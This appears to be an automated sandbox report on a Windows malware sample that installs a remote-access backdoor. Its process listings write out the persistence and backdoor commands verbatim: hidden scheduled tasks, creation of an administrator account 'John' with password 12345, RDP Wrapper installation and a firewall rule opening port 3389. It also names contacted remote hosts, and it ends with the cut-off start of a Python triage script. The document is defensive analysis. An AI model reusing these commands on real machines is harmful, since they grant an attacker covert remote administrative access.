Analysis Overview
SHA256
24b0e23df17c77d44882a2e25ecbd4d3b07015af5d44cb325679a370b8304614
Threat Level: Known bad
The file 24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe was found to be: Known bad.
Malicious Activity Summary
RMS
Suspicious use of NtCreateUserProcessOtherParentProcess
Grants admin privileges
Executes dropped EXE
Modifies Windows Firewall
Sets DLL path for service in the registry
Checks computer location settings
Loads dropped DLL
Modifies WinLogon
Looks up external IP address via web service
AutoIT Executable
Drops file in System32 directory
Drops file in Program Files directory
Enumerates physical storage devices
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Checks processor information in registry
Suspicious behavior: LoadsDriver
Suspicious use of WriteProcessMemory
Modifies registry class
Delays execution with timeout.exe
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
Runs net.exe
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-05-14 23:14
Signatures
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2022-05-14 23:14
Reported
2022-05-14 23:16
Platform
win7-20220414-en
Max time kernel
127s
Max time network
152s
Command Line
Signatures
RMS
Grants admin privileges
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| N/A | N/A | C:\ProgramData\RDPWinst.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
Modifies Windows Firewall
Sets DLL path for service in the registry
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe | N/A |
| N/A | N/A | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | C:\ProgramData\RDPWinst.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\RDP Wrapper\rdpwrap.dll | C:\ProgramData\RDPWinst.exe | N/A |
| File opened for modification | C:\Program Files\RDP Wrapper | C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe | N/A |
| File opened for modification | C:\Program Files\RDP Wrapper\rdpwrap.ini | C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe | N/A |
| File created | C:\Program Files\RDP Wrapper\rdpwrap.ini | C:\ProgramData\RDPWinst.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage | C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database | C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset | C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\RDPWinst.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe
"C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST
C:\ProgramData\Windows Tasks Service\winserv.exe
"C:\ProgramData\Windows Tasks Service\winserv.exe"
C:\ProgramData\Windows Tasks Service\winserv.exe
"C:\ProgramData\Windows Tasks Service\winserv.exe" -second
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net user John 12345 /add
C:\Windows\SysWOW64\net.exe
net user John 12345 /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user John 12345 /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Администраторы" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Администраторы" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Администраторы" John /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного управления" john /add" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного управления" john /add" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" john /add" John /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Administrators" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Administrators" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administrators" John /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Administradores" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Administradores" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administradores" John /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Remote Desktop Users" john /add
C:\Windows\SysWOW64\net.exe
net localgroup "Remote Desktop Users" john /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" john /add
C:\ProgramData\RDPWinst.exe
C:\ProgramData\RDPWinst.exe -i
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Programdata\Install\del.bat
C:\Windows\SysWOW64\timeout.exe
timeout 5
C:\Windows\system32\taskeng.exe
taskeng.exe {A0E3B6BA-8688-4493-ADB0-3E03F6A8A06F} S-1-5-21-790309383-526510583-3802439154-1000:TVHJCWMH\Admin:Interactive:[1]
C:\ProgramData\Windows Tasks Service\winserv.exe
"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
C:\ProgramData\Windows Tasks Service\winserv.exe
"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
Network
| Country | Destination | Domain | Proto |
| RU | 45.144.30.30:5655 | | tcp |
| US | 8.8.8.8:53 | idserver.xyz | udp |
| RU | 45.144.30.58:80 | idserver.xyz | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | freemail.freehost.com.ua | udp |
| UA | 194.0.200.251:465 | freemail.freehost.com.ua | tcp |
Files
memory/1788-54-0x0000000075DB1000-0x0000000075DB3000-memory.dmp
memory/948-55-0x0000000000000000-mapping.dmp
memory/1188-56-0x0000000000000000-mapping.dmp
\ProgramData\Windows Tasks Service\winserv.exe
| MD5 | 3f4f5a6cb95047fea6102bd7d2226aa9 |
| SHA1 | fc09dd898b6e7ff546e4a7517a715928fbafc297 |
| SHA256 | 99fd9e75e6241eff30e01c5b59df9e901fb24d12bee89c069cc6158f78b3cc98 |
| SHA512 | de5c8155f426a4e55953ae85410c7d9ad84f5643c30865fc036d1270310e28754772bd0f3093444a16ef0c1fa3db6c56301746fb5e7f03ce692bfdad0c4fb688 |
memory/1648-58-0x0000000000000000-mapping.dmp
C:\ProgramData\Windows Tasks Service\winserv.exe
| MD5 | 3f4f5a6cb95047fea6102bd7d2226aa9 |
| SHA1 | fc09dd898b6e7ff546e4a7517a715928fbafc297 |
| SHA256 | 99fd9e75e6241eff30e01c5b59df9e901fb24d12bee89c069cc6158f78b3cc98 |
| SHA512 | de5c8155f426a4e55953ae85410c7d9ad84f5643c30865fc036d1270310e28754772bd0f3093444a16ef0c1fa3db6c56301746fb5e7f03ce692bfdad0c4fb688 |
C:\ProgramData\Windows Tasks Service\winserv.exe
| MD5 | 3f4f5a6cb95047fea6102bd7d2226aa9 |
| SHA1 | fc09dd898b6e7ff546e4a7517a715928fbafc297 |
| SHA256 | 99fd9e75e6241eff30e01c5b59df9e901fb24d12bee89c069cc6158f78b3cc98 |
| SHA512 | de5c8155f426a4e55953ae85410c7d9ad84f5643c30865fc036d1270310e28754772bd0f3093444a16ef0c1fa3db6c56301746fb5e7f03ce692bfdad0c4fb688 |
C:\ProgramData\Windows Tasks Service\winserv.exe
| MD5 | 3f4f5a6cb95047fea6102bd7d2226aa9 |
| SHA1 | fc09dd898b6e7ff546e4a7517a715928fbafc297 |
| SHA256 | 99fd9e75e6241eff30e01c5b59df9e901fb24d12bee89c069cc6158f78b3cc98 |
| SHA512 | de5c8155f426a4e55953ae85410c7d9ad84f5643c30865fc036d1270310e28754772bd0f3093444a16ef0c1fa3db6c56301746fb5e7f03ce692bfdad0c4fb688 |
C:\ProgramData\Windows Tasks Service\settings.dat
| MD5 | 483fc2e7373a9ee36cc444fca67a32a8 |
| SHA1 | c2fe2355683b670622a8e00784bec5056291e494 |
| SHA256 | 2ee9e47fc7edee23653ee17475e0f040255aad1be11cfcec389335078561944d |
| SHA512 | e3b1cf539e5a542e0cab0ac9122e6027a5d489f0ac89a67070ad21ef7611010122ff2fad8d7d1d7fd6256bdb84e404a7eb8ef31bd86b0162b82c92d49af0a7e4 |
memory/1656-65-0x0000000000000000-mapping.dmp
memory/1592-66-0x0000000000000000-mapping.dmp
memory/1468-67-0x0000000000000000-mapping.dmp
memory/1548-68-0x0000000000000000-mapping.dmp
memory/1876-69-0x0000000000000000-mapping.dmp
memory/1116-70-0x0000000000000000-mapping.dmp
\??\PIPE\samr
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1784-72-0x0000000000000000-mapping.dmp
memory/1772-73-0x0000000000000000-mapping.dmp
memory/1424-74-0x0000000000000000-mapping.dmp
\??\PIPE\samr
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1700-76-0x0000000000000000-mapping.dmp
memory/1904-77-0x0000000000000000-mapping.dmp
memory/920-78-0x0000000000000000-mapping.dmp
memory/1284-79-0x0000000000000000-mapping.dmp
memory/744-80-0x0000000000000000-mapping.dmp
memory/284-81-0x0000000000000000-mapping.dmp
\??\PIPE\samr
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1532-83-0x0000000000000000-mapping.dmp
memory/2024-84-0x0000000000000000-mapping.dmp
memory/948-85-0x0000000000000000-mapping.dmp
\??\PIPE\samr
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2004-87-0x0000000000000000-mapping.dmp
memory/1956-88-0x0000000000000000-mapping.dmp
memory/1996-89-0x0000000000000000-mapping.dmp
\??\PIPE\samr
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
\ProgramData\RDPWinst.exe
| MD5 | 3288c284561055044c489567fd630ac2 |
| SHA1 | 11ffeabbe42159e1365aa82463d8690c845ce7b7 |
| SHA256 | ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753 |
| SHA512 | c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02 |
memory/1864-92-0x0000000000000000-mapping.dmp
C:\ProgramData\RDPWinst.exe
| MD5 | 3288c284561055044c489567fd630ac2 |
| SHA1 | 11ffeabbe42159e1365aa82463d8690c845ce7b7 |
| SHA256 | ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753 |
| SHA512 | c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02 |
\Program Files\RDP Wrapper\rdpwrap.dll
| MD5 | 461ade40b800ae80a40985594e1ac236 |
| SHA1 | b3892eef846c044a2b0785d54a432b3e93a968c8 |
| SHA256 | 798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4 |
| SHA512 | 421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26 |
memory/1540-95-0x0000000000000000-mapping.dmp
memory/1540-96-0x000007FEFB931000-0x000007FEFB933000-memory.dmp
memory/2004-97-0x0000000000000000-mapping.dmp
C:\Programdata\Install\del.bat
| MD5 | 49a9fec3ba20596a39e2bfae59ff4b3c |
| SHA1 | b9cc7369a94831b912ed85532d7cc99f32c82040 |
| SHA256 | 3a85f338cd09aefe830c7b8bac225e3d8d847b7184ecfb625ad7f46492dba681 |
| SHA512 | e5174539967fbc5dd1a4cec7d7a868c45ff58906fd2e580ba49a82b0ff6fabfb0564678d3aca37e86f9124776d7aba6c65fa0f72219e0474adcb9dc8e7484bea |
memory/1116-99-0x0000000000000000-mapping.dmp
C:\ProgramData\Windows Tasks Service\winserv.exe
| MD5 | 3f4f5a6cb95047fea6102bd7d2226aa9 |
| SHA1 | fc09dd898b6e7ff546e4a7517a715928fbafc297 |
| SHA256 | 99fd9e75e6241eff30e01c5b59df9e901fb24d12bee89c069cc6158f78b3cc98 |
| SHA512 | de5c8155f426a4e55953ae85410c7d9ad84f5643c30865fc036d1270310e28754772bd0f3093444a16ef0c1fa3db6c56301746fb5e7f03ce692bfdad0c4fb688 |
memory/1236-100-0x0000000000000000-mapping.dmp
C:\ProgramData\Windows Tasks Service\winserv.exe
| MD5 | 3f4f5a6cb95047fea6102bd7d2226aa9 |
| SHA1 | fc09dd898b6e7ff546e4a7517a715928fbafc297 |
| SHA256 | 99fd9e75e6241eff30e01c5b59df9e901fb24d12bee89c069cc6158f78b3cc98 |
| SHA512 | de5c8155f426a4e55953ae85410c7d9ad84f5643c30865fc036d1270310e28754772bd0f3093444a16ef0c1fa3db6c56301746fb5e7f03ce692bfdad0c4fb688 |
memory/1372-103-0x0000000000000000-mapping.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-05-14 23:14
Reported
2022-05-14 23:16
Platform
win10v2004-20220414-en
Max time kernel
147s
Max time network
147s
Command Line
Signatures
RMS
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2188 created 3212 | N/A | C:\Windows\system32\svchost.exe | C:\ProgramData\Windows Tasks Service\winserv.exe |
Grants admin privileges
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| N/A | N/A | C:\ProgramData\RDPWinst.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
Modifies Windows Firewall
Sets DLL path for service in the registry
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\svchost.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | C:\ProgramData\RDPWinst.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\rfxvmt.dll | C:\ProgramData\RDPWinst.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\RDP Wrapper | C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe | N/A |
| File opened for modification | C:\Program Files\RDP Wrapper\rdpwrap.ini | C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe | N/A |
| File created | C:\Program Files\RDP Wrapper\rdpwrap.ini | C:\ProgramData\RDPWinst.exe | N/A |
| File created | C:\Program Files\RDP Wrapper\rdpwrap.dll | C:\ProgramData\RDPWinst.exe | N/A |
| File opened for modification | \??\c:\program files\rdp wrapper\rdpwrap.txt | C:\Windows\System32\svchost.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\MIME\Database | C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset | C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage | C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\RDPWinst.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe
"C:\Users\Admin\AppData\Local\Temp\24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST
C:\ProgramData\Windows Tasks Service\winserv.exe
"C:\ProgramData\Windows Tasks Service\winserv.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
C:\ProgramData\Windows Tasks Service\winserv.exe
"C:\ProgramData\Windows Tasks Service\winserv.exe" -second
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net user John 12345 /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Администраторы" John /add
C:\Windows\SysWOW64\net.exe
net user John 12345 /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user John 12345 /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Администраторы" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Администраторы" John /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного управления" john /add" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного управления" john /add" John /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Administrators" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" john /add" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Administrators" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administrators" John /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Administradores" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Administradores" John /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Remote Desktop Users" john /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administradores" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Remote Desktop Users" john /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" john /add
C:\ProgramData\RDPWinst.exe
C:\ProgramData\RDPWinst.exe -i
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
C:\Windows\SYSTEM32\netsh.exe
netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
C:\Windows\SysWOW64\timeout.exe
timeout 5
C:\ProgramData\Windows Tasks Service\winserv.exe
"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
C:\ProgramData\Windows Tasks Service\winserv.exe
"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
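The process trees of behavioral1 and behavioral2 above show the same chain: two scheduled tasks (one every minute, one at logon, both /RL HIGHEST) that relaunch winserv.exe from ProgramData, creation of a local account "John", its addition to the Administrators and Remote Desktop Users groups under several localized names (the Russian and Spanish group names are tried blindly because net.exe only accepts the name in the OS display language; one of the Russian lines is malformed, with a stray `" John /add` appended), an RDP Wrapper install (RDPWinst.exe -i) and a firewall rule opening TCP 3389. The Python below is an added example, not part of the report and not the sample's own code: it classifies command lines of that shape and only returns an "rdp-backdoor" verdict when account creation, group elevation and RDP exposure all occur together. The log lines in SAMPLE_PROCESS_LOG are constructed from the command lines listed above plus two benign lines; the tag names, the GROUP_ALIASES mapping and the user-writable directory list are this example's own assumptions.

```python
"""Triage of the process command lines shown in the two behavioral runs above.

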